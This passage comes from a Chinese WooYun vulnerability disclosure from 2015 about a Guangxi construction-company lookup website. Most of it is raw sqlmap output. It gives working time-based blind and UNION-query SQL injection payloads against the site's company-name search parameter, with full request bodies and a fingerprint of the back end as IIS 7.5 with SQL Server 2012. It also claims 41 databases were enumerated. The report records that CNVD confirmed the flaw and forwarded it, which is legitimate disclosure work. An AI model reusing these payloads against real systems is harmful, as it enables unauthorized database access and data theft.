wMmQCBA9kFgJmDxUBAGQCAg8PFgQeCUJhY2tDb2xvcgoAHgRfIVNCAghkFgpmD2QWAmYPFQEBMmQCAQ9
kFgJmDxUCJDJFMUU5RkU3LTYwMUYtNDdCRS1COTIwLUI1NDBERThBNTAzRiHlhajlt57ljr/nrKzkuoz
lu7rnrZHlt6XnqIvlhazlj7hkAgIPZBYCZg8VAQnmoYLmnpfluIJkAgMPZBYCZg8VAQ9BMzAxMjA0NTA
zMjQgMDNkAgQPZBYCZg8VAQBkAgMPZBYKZg9kFgJmDxUBATNkAgEPZBYCZg8VAiQ3OUU3NUM3MC01ODU
5LTQzREYtOUY5Qy05NTE0QjcyMzlBNUEh5YWo5bee5Y6/56ys5LiJ5bu6562R5bel56iL5YWs5Y+4ZAI
CD2QWAmYPFQEJ5qGC5p6X5biCZAIDD2QWAmYPFQEOQTMwMTIwNDUwMzI0MDJkAgQPZBYCZg8VAQBkAgQ
PDxYEHwUKAB8GAghkFgpmD2QWAmYPFQEBNGQCAQ9kFgJmDxUCJEExNEMzMDA2LTYzQUYtNDJEOC04OUV
BLTQxRjgyQ0QzQTI3MjDlhajlt57ljr/ln47kuaHlu7rorr7lu7rnrZHlronoo4Xlt6XnqIvmgLvlhaz
lj7hkAgIPZBYCZg8VAQnmoYLmnpfluIJkAgMPZBYCZg8VAQ5BMzAxMTA0NTAzMjQwMWQCBA9kFgJmDxU
BAGQCBQ9kFgpmD2QWAmYPFQEBNWQCAQ9kFgJmDxUCJGE2MDk4MGQ4LWFiZWUtNDk1My04YmE4LTBkM2M
5YWJhYzc0YiTlhajlt57ljr/oo5Xpkavmt7flh53lnJ/mnInpmZDlhazlj7hkAgIPZBYCZg8VAQnmoYL
mnpfluIJkAgMPZBYCZg8VAQ5CMzA1NDA0NTAzMjQwMWQCBA9kFgJmDxUBCjIwMTMtMDctMDlkAgYPDxY
EHwUKAB8GAghkFgpmD2QWAmYPFQEBNmQCAQ9kFgJmDxUCJERFQzlCNjNDLUZFMTAtNDFENi1CQ0IwLUM
2QkNGNzY1QkU2Ny3lub/opb/lhajlt57ljr/nrKzkupTlu7rnrZHlronoo4Xlt6XnqIvlhazlj7hkAgI
PZBYCZg8VAQnmoYLmnpfluIJkAgMPZBYCZg8VAQ5BMzAxMjA0NTAzMjQwMWQCBA9kFgJmDxUBAGQCBw9
kFgpmD2QWAmYPFQEBN2QCAQ9kFgJmDxUCJDM2ZTAwN2JlLWE1ZTYtNDU3Ny05ODVkLTE5YjlkYjdjMGJ
mYx7lhajlt57kuIfpuYLlnLDkuqfmnInpmZDlhazlj7hkAgIPZBYCZg8VAQnmoYLmnpfluIJkAgMPZBY
CZg8VAQBkAgQPZBYCZg8VAQoxOTAwLTAxLTAxZAIIDw8WBB8FCgAfBgIIZBYKZg9kFgJmDxUBAThkAgE
PZBYCZg8VAiRkMmU2YjdhZS00NmE2LTQyNDAtYWEyZi02Y2VkZjI0NjUwMDMk5YWo5bee5Y6/5paw5Z+
O5oi/5Zyw5Lqn5byA5Y+R5YWs5Y+4ZAICD2QWAmYPFQEJ5qGC5p6X5biCZAIDD2QWAmYPFQEAZAIED2Q
WAmYPFQEKMTkwMC0wMS0wMWQCCQ9kFgpmD2QWAmYPFQEBOWQCAQ9kFgJmDxUCJDVlYjc4NWNlLTQ0ZmE
tNDk0ZC1hZTllLWMxNzIyNmEyOTgyNB7lhajlt57ljr/miL/lnLDkuqflvIDlj5Hlhazlj7hkAgIPZBY
CZg8VAQnmoYLmnpfluIJkAgMPZBYCZg8VAQBkAgQPZBYCZg8VAQoxOTAwLTAxLTAxZAIKDw8WBB8FCgA
fBgIIZBYKZg9kFgJmDxUBAjEwZAIBD2QWAmYPFQIkZmI1ODg4OGQtNDY3NC00ZGVjLWI1YWMtNWI5NGM
wZGUwMzY3MOWFqOW3nuWOv+WFtOWIm+aIv+WcsOS6p+W8gOWPkeaciemZkOi0o+S7u+WFrOWPuGQCAg9
kFgJmDxUBCeahguael+W4gmQCAw9kFgJmDxUBAGQCBA9kFgJmDxUBCjE5MDAtMDEtMDFkAgMPDxYGHgt
SZWNvcmRjb3VudAIRHg5DdXN0b21JbmZvVGV4dAUq5b2T5YmN56ysMS8y6aG1IOWFsTE35p2h6K6w5b2
VIOavj+mhtTEw5p2hHghQYWdlU2l6ZQIKZGRkFrFbBwiS9lAJVJ/jutdnPjul7ZM=&__VIEWSTATEGEN
ERATOR=2EF0303B&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=/wEWIQLMvfGkAg
KjsrOUBQKb1YvfDwKUuo2xAwKUuoGxAwKUutWyAwKUutGyAwKUuu2yAwKUut2yAwKUutmyAwKQuumyAw
KXuumyAwKVuuGyAwLA5PH2DgKJzbX2CwKZop+YBwLl3+FvAuXf9cgJAuXfmZUCAuXfrf4KAuXfsdsDAu
XfxacEAuXf6YANAuXf/e0FAuXfwYQLAuXf1eEDAo6xxNgOAo6x6KUHAo6x/I4IAo6xgGsCjrGUtAkC8b
7ZswwC2datqgvfWJbERdmZ02fWoiFl4HBUDBMYIg==&ctl00$ctl00$ContentPlaceHolder1$Searc
h$DanWeiName=%E5%85%A8%E5%B7%9E%';WAITFOR DELAY '0:0:5'--&ctl00$ctl00$ContentPla
ceHolder1$Search$DanWeiType=&ctl00$ctl00$ContentPlaceHolder1$Search$ZiZhiNum=&ct
l00$ctl00$ContentPlaceHolder1$Search$CityNum=&ctl00$ctl00$ContentPlaceHolder1$Se
arch$Edate=&ctl00$ctl00$ContentPlaceHolder1$Search$BtnSearch=%E6%90%9C%E7%B4%A2
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind (comment)
Payload: __VIEWSTATE=/wEPDwUJOTYzNTYxNjUxD2QWAmYPZBYCZg9kFgICAw9kFgRmDw8WAh4
EVGV4dAUM5LyB5Lia5L+h5oGvZGQCAQ9kFgYCAQ8PFgIfAAUM5LyB5Lia5L+h5oGvZGQCAw9kFgYCAQ8
PFgIfAAUG5YWo5beeZGQCAw8QZA8WC2YCAQICAgMCBAIFAgYCBwIIAgkCChYLEGVlZxAFDOajgOa1i+a
cuuaehAUCMTlnEAUM5oub5qCH5Luj55CGBQIxOGcQBQzmlr3lt6XljZXkvY0FAjEzZxAFDOebkeeQhuW
NleS9jQUCMTRnEAUM5bu66K6+5Y2V5L2NBQIxMWcQBQzli5jlr5/ljZXkvY0FAjE1ZxAFDOiuvuiuoeW
NleS9jQUCMTZnEAUP5oi/5Zyw5Lqn5LyB5LiaBQI1MmcQBRLmlr3lt6Xlm77lrqHmnLrmnoQFAjQyZxA
FDOWbreael+WNleS9jQUCMjBnZGQCBw8QZA8WEWYCAQICAgMCBAIFAgYCBwIIAgkCCgILAgwCDQIOAg8
CEBYREGVlZxAFBuWMuuWklgUBMGcQBRXlub/opb/lo67ml4/oh6rmsrvljLoFBjQ1MDAwMGcQBQnljZf
lroHluIIFBjQ1MDEwMGcQBQnmn7Plt57luIIFBjQ1MDIwMGcQBQnmoYLmnpfluIIFBjQ1MDMwMGcQBQn
moqflt57luIIFBjQ1MDQwMGcQBQnljJfmtbfluIIFBjQ1MDUwMGcQBQzpmLLln47muK/luIIFBjQ1MDY
wMGcQBQnpkqblt57luIIFBjQ1MDcwMGcQBQnotLXmuK/luIIFBjQ1MDgwMGcQBQnnjonmnpfluIIFBjQ
1MDkwMGcQBQnnmb7oibLluIIFBjQ1MTAwMGcQBQnotLrlt57luIIFBjQ1MTEwMGcQBQnmsrPmsaDluII
FBjQ1MTIwMGcQBQnmnaXlrr7luIIFBjQ1MTMwMGcQBQnltIflt6bluIIFBjQ1MTQwMGdkZAIFD2QWBAI
BDzwrAAsBAA8WCB4IRGF0YUtleXMWAB4LXyFJdGVtQ291bnQCCh4JUGFnZUNvdW50AgEeFV8hRGF0YVN
vdXJjZUl0ZW1Db3VudAIKZBYCZg9kFhQCAQ9kFgpmD2QWAmYPFQEBMWQCAQ9kFgJmDxUCJDI1ODA2OTI
5LTk1NzAtNDg4MS1CM0IxLTBCNDY0MzgzN0VDQi3lhajlt57ljr/mlrDln47lu7rnrZHlt6XnqIvmnIn
pmZDotKPku7vlhazlj7hkAgIPZBYCZg8VAQnmoYLmnpfluIJkAgMPZBYCZg8VAQ5BMzAxNDA0NTAzMjQ
wMmQCBA9kFgJmDxUBAGQCAg8PFgQeCUJhY2tDb2xvcgoAHgRfIVNCAghkFgpmD2QWAmYPFQEBMmQCAQ9
kFgJmDxUCJDJFMUU5RkU3LTYwMUYtNDdCRS1COTIwLUI1NDBERThBNTAzRiHlhajlt57ljr/nrKzkuoz
lu7rnrZHlt6XnqIvlhazlj7hkAgIPZBYCZg8VAQnmoYLmnpfluIJkAgMPZBYCZg8VAQ9BMzAxMjA0NTA
zMjQgMDNkAgQPZBYCZg8VAQBkAgMPZBYKZg9kFgJmDxUBATNkAgEPZBYCZg8VAiQ3OUU3NUM3MC01ODU
5LTQzREYtOUY5Qy05NTE0QjcyMzlBNUEh5YWo5bee5Y6/56ys5LiJ5bu6562R5bel56iL5YWs5Y+4ZAI
CD2QWAmYPFQEJ5qGC5p6X5biCZAIDD2QWAmYPFQEOQTMwMTIwNDUwMzI0MDJkAgQPZBYCZg8VAQBkAgQ
PDxYEHwUKAB8GAghkFgpmD2QWAmYPFQEBNGQCAQ9kFgJmDxUCJEExNEMzMDA2LTYzQUYtNDJEOC04OUV
BLTQxRjgyQ0QzQTI3MjDlhajlt57ljr/ln47kuaHlu7rorr7lu7rnrZHlronoo4Xlt6XnqIvmgLvlhaz
lj7hkAgIPZBYCZg8VAQnmoYLmnpfluIJkAgMPZBYCZg8VAQ5BMzAxMTA0NTAzMjQwMWQCBA9kFgJmDxU
BAGQCBQ9kFgpmD2QWAmYPFQEBNWQCAQ9kFgJmDxUCJGE2MDk4MGQ4LWFiZWUtNDk1My04YmE4LTBkM2M
5YWJhYzc0YiTlhajlt57ljr/oo5Xpkavmt7flh53lnJ/mnInpmZDlhazlj7hkAgIPZBYCZg8VAQnmoYL
mnpfluIJkAgMPZBYCZg8VAQ5CMzA1NDA0NTAzMjQwMWQCBA9kFgJmDxUBCjIwMTMtMDctMDlkAgYPDxY
EHwUKAB8GAghkFgpmD2QWAmYPFQEBNmQCAQ9kFgJmDxUCJERFQzlCNjNDLUZFMTAtNDFENi1CQ0IwLUM
2QkNGNzY1QkU2Ny3lub/opb/lhajlt57ljr/nrKzkupTlu7rnrZHlronoo4Xlt6XnqIvlhazlj7hkAgI
PZBYCZg8VAQnmoYLmnpfluIJkAgMPZBYCZg8VAQ5BMzAxMjA0NTAzMjQwMWQCBA9kFgJmDxUBAGQCBw9
kFgpmD2QWAmYPFQEBN2QCAQ9kFgJmDxUCJDM2ZTAwN2JlLWE1ZTYtNDU3Ny05ODVkLTE5YjlkYjdjMGJ
mYx7lhajlt57kuIfpuYLlnLDkuqfmnInpmZDlhazlj7hkAgIPZBYCZg8VAQnmoYLmnpfluIJkAgMPZBY
CZg8VAQBkAgQPZBYCZg8VAQoxOTAwLTAxLTAxZAIIDw8WBB8FCgAfBgIIZBYKZg9kFgJmDxUBAThkAgE
PZBYCZg8VAiRkMmU2YjdhZS00NmE2LTQyNDAtYWEyZi02Y2VkZjI0NjUwMDMk5YWo5bee5Y6/5paw5Z+
O5oi/5Zyw5Lqn5byA5Y+R5YWs5Y+4ZAICD2QWAmYPFQEJ5qGC5p6X5biCZAIDD2QWAmYPFQEAZAIED2Q
WAmYPFQEKMTkwMC0wMS0wMWQCCQ9kFgpmD2QWAmYPFQEBOWQCAQ9kFgJmDxUCJDVlYjc4NWNlLTQ0ZmE
tNDk0ZC1hZTllLWMxNzIyNmEyOTgyNB7lhajlt57ljr/miL/lnLDkuqflvIDlj5Hlhazlj7hkAgIPZBY
CZg8VAQnmoYLmnpfluIJkAgMPZBYCZg8VAQBkAgQPZBYCZg8VAQoxOTAwLTAxLTAxZAIKDw8WBB8FCgA
fBgIIZBYKZg9kFgJmDxUBAjEwZAIBD2QWAmYPFQIkZmI1ODg4OGQtNDY3NC00ZGVjLWI1YWMtNWI5NGM
wZGUwMzY3MOWFqOW3nuWOv+WFtOWIm+aIv+WcsOS6p+W8gOWPkeaciemZkOi0o+S7u+WFrOWPuGQCAg9
kFgJmDxUBCeahguael+W4gmQCAw9kFgJmDxUBAGQCBA9kFgJmDxUBCjE5MDAtMDEtMDFkAgMPDxYGHgt
SZWNvcmRjb3VudAIRHg5DdXN0b21JbmZvVGV4dAUq5b2T5YmN56ysMS8y6aG1IOWFsTE35p2h6K6w5b2
VIOavj+mhtTEw5p2hHghQYWdlU2l6ZQIKZGRkFrFbBwiS9lAJVJ/jutdnPjul7ZM=&__VIEWSTATEGEN
ERATOR=2EF0303B&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=/wEWIQLMvfGkAg
KjsrOUBQKb1YvfDwKUuo2xAwKUuoGxAwKUutWyAwKUutGyAwKUuu2yAwKUut2yAwKUutmyAwKQuumyAw
KXuumyAwKVuuGyAwLA5PH2DgKJzbX2CwKZop+YBwLl3+FvAuXf9cgJAuXfmZUCAuXfrf4KAuXfsdsDAu
XfxacEAuXf6YANAuXf/e0FAuXfwYQLAuXf1eEDAo6xxNgOAo6x6KUHAo6x/I4IAo6xgGsCjrGUtAkC8b
7ZswwC2datqgvfWJbERdmZ02fWoiFl4HBUDBMYIg==&ctl00$ctl00$ContentPlaceHolder1$Searc
h$DanWeiName=%E5%85%A8%E5%B7%9E%' WAITFOR DELAY '0:0:5'--&ctl00$ctl00$ContentPla
ceHolder1$Search$DanWeiType=&ctl00$ctl00$ContentPlaceHolder1$Search$ZiZhiNum=&ct
l00$ctl00$ContentPlaceHolder1$Search$CityNum=&ctl00$ctl00$ContentPlaceHolder1$Se
arch$Edate=&ctl00$ctl00$ContentPlaceHolder1$Search$BtnSearch=%E6%90%9C%E7%B4%A2
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: __VIEWSTATE=/wEPDwUJOTYzNTYxNjUxD2QWAmYPZBYCZg9kFgICAw9kFgRmDw8WAh4
EVGV4dAUM5LyB5Lia5L+h5oGvZGQCAQ9kFgYCAQ8PFgIfAAUM5LyB5Lia5L+h5oGvZGQCAw9kFgYCAQ8
PFgIfAAUG5YWo5beeZGQCAw8QZA8WC2YCAQICAgMCBAIFAgYCBwIIAgkCChYLEGVlZxAFDOajgOa1i+a
cuuaehAUCMTlnEAUM5oub5qCH5Luj55CGBQIxOGcQBQzmlr3lt6XljZXkvY0FAjEzZxAFDOebkeeQhuW
NleS9jQUCMTRnEAUM5bu66K6+5Y2V5L2NBQIxMWcQBQzli5jlr5/ljZXkvY0FAjE1ZxAFDOiuvuiuoeW
NleS9jQUCMTZnEAUP5oi/5Zyw5Lqn5LyB5LiaBQI1MmcQBRLmlr3lt6Xlm77lrqHmnLrmnoQFAjQyZxA
FDOWbreael+WNleS9jQUCMjBnZGQCBw8QZA8WEWYCAQICAgMCBAIFAgYCBwIIAgkCCgILAgwCDQIOAg8
CEBYREGVlZxAFBuWMuuWklgUBMGcQBRXlub/opb/lo67ml4/oh6rmsrvljLoFBjQ1MDAwMGcQBQnljZf
lroHluIIFBjQ1MDEwMGcQBQnmn7Plt57luIIFBjQ1MDIwMGcQBQnmoYLmnpfluIIFBjQ1MDMwMGcQBQn
moqflt57luIIFBjQ1MDQwMGcQBQnljJfmtbfluIIFBjQ1MDUwMGcQBQzpmLLln47muK/luIIFBjQ1MDY
wMGcQBQnpkqblt57luIIFBjQ1MDcwMGcQBQnotLXmuK/luIIFBjQ1MDgwMGcQBQnnjonmnpfluIIFBjQ
1MDkwMGcQBQnnmb7oibLluIIFBjQ1MTAwMGcQBQnotLrlt57luIIFBjQ1MTEwMGcQBQnmsrPmsaDluII
FBjQ1MTIwMGcQBQnmnaXlrr7luIIFBjQ1MTMwMGcQBQnltIflt6bluIIFBjQ1MTQwMGdkZAIFD2QWBAI
BDzwrAAsBAA8WCB4IRGF0YUtleXMWAB4LXyFJdGVtQ291bnQCCh4JUGFnZUNvdW50AgEeFV8hRGF0YVN
vdXJjZUl0ZW1Db3VudAIKZBYCZg9kFhQCAQ9kFgpmD2QWAmYPFQEBMWQCAQ9kFgJmDxUCJDI1ODA2OTI
5LTk1NzAtNDg4MS1CM0IxLTBCNDY0MzgzN0VDQi3lhajlt57ljr/mlrDln47lu7rnrZHlt6XnqIvmnIn
pmZDotKPku7vlhazlj7hkAgIPZBYCZg8VAQnmoYLmnpfluIJkAgMPZBYCZg8VAQ5BMzAxNDA0NTAzMjQ
wMmQCBA9kFgJmDxUBAGQCAg8PFgQeCUJhY2tDb2xvcgoAHgRfIVNCAghkFgpmD2QWAmYPFQEBMmQCAQ9
kFgJmDxUCJDJFMUU5RkU3LTYwMUYtNDdCRS1COTIwLUI1NDBERThBNTAzRiHlhajlt57ljr/nrKzkuoz
lu7rnrZHlt6XnqIvlhazlj7hkAgIPZBYCZg8VAQnmoYLmnpfluIJkAgMPZBYCZg8VAQ9BMzAxMjA0NTA
zMjQgMDNkAgQPZBYCZg8VAQBkAgMPZBYKZg9kFgJmDxUBATNkAgEPZBYCZg8VAiQ3OUU3NUM3MC01ODU
5LTQzREYtOUY5Qy05NTE0QjcyMzlBNUEh5YWo5bee5Y6/56ys5LiJ5bu6562R5bel56iL5YWs5Y+4ZAI
CD2QWAmYPFQEJ5qGC5p6X5biCZAIDD2QWAmYPFQEOQTMwMTIwNDUwMzI0MDJkAgQPZBYCZg8VAQBkAgQ
PDxYEHwUKAB8GAghkFgpmD2QWAmYPFQEBNGQCAQ9kFgJmDxUCJEExNEMzMDA2LTYzQUYtNDJEOC04OUV
BLTQxRjgyQ0QzQTI3MjDlhajlt57ljr/ln47kuaHlu7rorr7lu7rnrZHlronoo4Xlt6XnqIvmgLvlhaz
lj7hkAgIPZBYCZg8VAQnmoYLmnpfluIJkAgMPZBYCZg8VAQ5BMzAxMTA0NTAzMjQwMWQCBA9kFgJmDxU
BAGQCBQ9kFgpmD2QWAmYPFQEBNWQCAQ9kFgJmDxUCJGE2MDk4MGQ4LWFiZWUtNDk1My04YmE4LTBkM2M
5YWJhYzc0YiTlhajlt57ljr/oo5Xpkavmt7flh53lnJ/mnInpmZDlhazlj7hkAgIPZBYCZg8VAQnmoYL
mnpfluIJkAgMPZBYCZg8VAQ5CMzA1NDA0NTAzMjQwMWQCBA9kFgJmDxUBCjIwMTMtMDctMDlkAgYPDxY
EHwUKAB8GAghkFgpmD2QWAmYPFQEBNmQCAQ9kFgJmDxUCJERFQzlCNjNDLUZFMTAtNDFENi1CQ0IwLUM
2QkNGNzY1QkU2Ny3lub/opb/lhajlt57ljr/nrKzkupTlu7rnrZHlronoo4Xlt6XnqIvlhazlj7hkAgI
PZBYCZg8VAQnmoYLmnpfluIJkAgMPZBYCZg8VAQ5BMzAxMjA0NTAzMjQwMWQCBA9kFgJmDxUBAGQCBw9
kFgpmD2QWAmYPFQEBN2QCAQ9kFgJmDxUCJDM2ZTAwN2JlLWE1ZTYtNDU3Ny05ODVkLTE5YjlkYjdjMGJ
mYx7lhajlt57kuIfpuYLlnLDkuqfmnInpmZDlhazlj7hkAgIPZBYCZg8VAQnmoYLmnpfluIJkAgMPZBY
CZg8VAQBkAgQPZBYCZg8VAQoxOTAwLTAxLTAxZAIIDw8WBB8FCgAfBgIIZBYKZg9kFgJmDxUBAThkAgE
PZBYCZg8VAiRkMmU2YjdhZS00NmE2LTQyNDAtYWEyZi02Y2VkZjI0NjUwMDMk5YWo5bee5Y6/5paw5Z+
O5oi/5Zyw5Lqn5byA5Y+R5YWs5Y+4ZAICD2QWAmYPFQEJ5qGC5p6X5biCZAIDD2QWAmYPFQEAZAIED2Q
WAmYPFQEKMTkwMC0wMS0wMWQCCQ9kFgpmD2QWAmYPFQEBOWQCAQ9kFgJmDxUCJDVlYjc4NWNlLTQ0ZmE
tNDk0ZC1hZTllLWMxNzIyNmEyOTgyNB7lhajlt57ljr/miL/lnLDkuqflvIDlj5Hlhazlj7hkAgIPZBY
CZg8VAQnmoYLmnpfluIJkAgMPZBYCZg8VAQBkAgQPZBYCZg8VAQoxOTAwLTAxLTAxZAIKDw8WBB8FCgA
fBgIIZBYKZg9kFgJmDxUBAjEwZAIBD2QWAmYPFQIkZmI1ODg4OGQtNDY3NC00ZGVjLWI1YWMtNWI5NGM
wZGUwMzY3MOWFqOW3nuWOv+WFtOWIm+aIv+WcsOS6p+W8gOWPkeaciemZkOi0o+S7u+WFrOWPuGQCAg9
kFgJmDxUBCeahguael+W4gmQCAw9kFgJmDxUBAGQCBA9kFgJmDxUBCjE5MDAtMDEtMDFkAgMPDxYGHgt
SZWNvcmRjb3VudAIRHg5DdXN0b21JbmZvVGV4dAUq5b2T5YmN56ysMS8y6aG1IOWFsTE35p2h6K6w5b2
VIOavj+mhtTEw5p2hHghQYWdlU2l6ZQIKZGRkFrFbBwiS9lAJVJ/jutdnPjul7ZM=&__VIEWSTATEGEN
ERATOR=2EF0303B&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=/wEWIQLMvfGkAg
KjsrOUBQKb1YvfDwKUuo2xAwKUuoGxAwKUutWyAwKUutGyAwKUuu2yAwKUut2yAwKUutmyAwKQuumyAw
KXuumyAwKVuuGyAwLA5PH2DgKJzbX2CwKZop+YBwLl3+FvAuXf9cgJAuXfmZUCAuXfrf4KAuXfsdsDAu
XfxacEAuXf6YANAuXf/e0FAuXfwYQLAuXf1eEDAo6xxNgOAo6x6KUHAo6x/I4IAo6xgGsCjrGUtAkC8b
7ZswwC2datqgvfWJbERdmZ02fWoiFl4HBUDBMYIg==&ctl00$ctl00$ContentPlaceHolder1$Searc
h$DanWeiName=%E5%85%A8%E5%B7%9E%' UNION ALL SELECT CHAR(113)+CHAR(122)+CHAR(113)
+CHAR(106)+CHAR(113)+CHAR(68)+CHAR(110)+CHAR(69)+CHAR(80)+CHAR(73)+CHAR(122)+CHA
R(78)+CHAR(90)+CHAR(66)+CHAR(88)+CHAR(67)+CHAR(119)+CHAR(116)+CHAR(111)+CHAR(122
)+CHAR(114)+CHAR(82)+CHAR(116)+CHAR(115)+CHAR(99)+CHAR(69)+CHAR(80)+CHAR(71)+CHA
R(74)+CHAR(74)+CHAR(119)+CHAR(68)+CHAR(121)+CHAR(104)+CHAR(112)+CHAR(68)+CHAR(75
)+CHAR(121)+CHAR(72)+CHAR(72)+CHAR(87)+CHAR(73)+CHAR(120)+CHAR(107)+CHAR(75)+CHA
R(113)+CHAR(106)+CHAR(118)+CHAR(98)+CHAR(113)-- &ctl00$ctl00$ContentPlaceHolder1
$Search$DanWeiType=&ctl00$ctl00$ContentPlaceHolder1$Search$ZiZhiNum=&ctl00$ctl00
$ContentPlaceHolder1$Search$CityNum=&ctl00$ctl00$ContentPlaceHolder1$Search$Edat
e=&ctl00$ctl00$ContentPlaceHolder1$Search$BtnSearch=%E6%90%9C%E7%B4%A2
---
[04:25:09] [INFO] testing Microsoft SQL Server
[04:25:11] [INFO] confirming Microsoft SQL Server
[04:25:15] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2012

漏洞证明:

41个数据库:

数据库.png

修复方案:

@@

版权声明:转载请注明来源 无名人@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-12-15 11:51

厂商回复:

CNVD确认并复现所述漏洞情况,已经转由CNCERT下发给广西分中心,由广西分中心后续协调网站管理单位处置。

最新状态:

暂无


漏洞评价:

评价